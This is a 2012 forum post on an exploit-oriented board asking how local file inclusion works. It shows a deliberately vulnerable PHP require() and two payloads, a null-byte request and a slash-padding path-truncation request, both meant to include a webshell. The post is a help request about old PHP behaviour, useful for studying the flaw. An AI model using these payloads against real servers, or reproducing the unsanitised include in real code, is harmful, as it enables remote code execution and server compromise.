iExploit
Recent
Activity
Sign up
Have an account?
Sign in
Howdy, Stranger!
It looks like you're new here. If you want to get involved, click one of these buttons!
Sign In
Apply for Membership
Top Posters
Xin
3251
Sh3llc0d3
1910
chroniccommand
1389
undead
822
George
707
GameOver
675
Bursihido
406
m0rph
332
Mr. P-teo
269
D0WNGRADE
220
Who's Online (5)
0x1983
6:06AM
Adielufc69
4:13AM
Beesley
2:54AM
Endgame711
5:01AM
m0rph
4:00AM
Powered by
Vanilla.
Made with
Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Web Application Security
How to use / to LFI
laterain
December 2012
Posts: 3
vul.php code:
<%php
$xx = $_REQUEST['xx'];
require("./te$xx.php");
%>
I have a webshell at ./shell.txt
We can GET /vul.php?xx=/../shell.txt%00 to get a shell,
but the php version must before 5.3.4!
However,I had heard another way to get a shell !
The way is : we can GET /vul.php?xx=/../shell.txt////////////////////////////////(here is so many '/')
But,I can't get the shell at last!
Here is the check code:
<?php
$xx = 'shell.txt';
for($i=0;$i<=1000000;$i++)
{
$xx .= '/';
}
require("./$xx.php");
?>
Somebody had got a shell by this way!
Did the php have this bug?
Can you help me ? Thx.
PS:I'm not good at English,sorry.
Add a Comment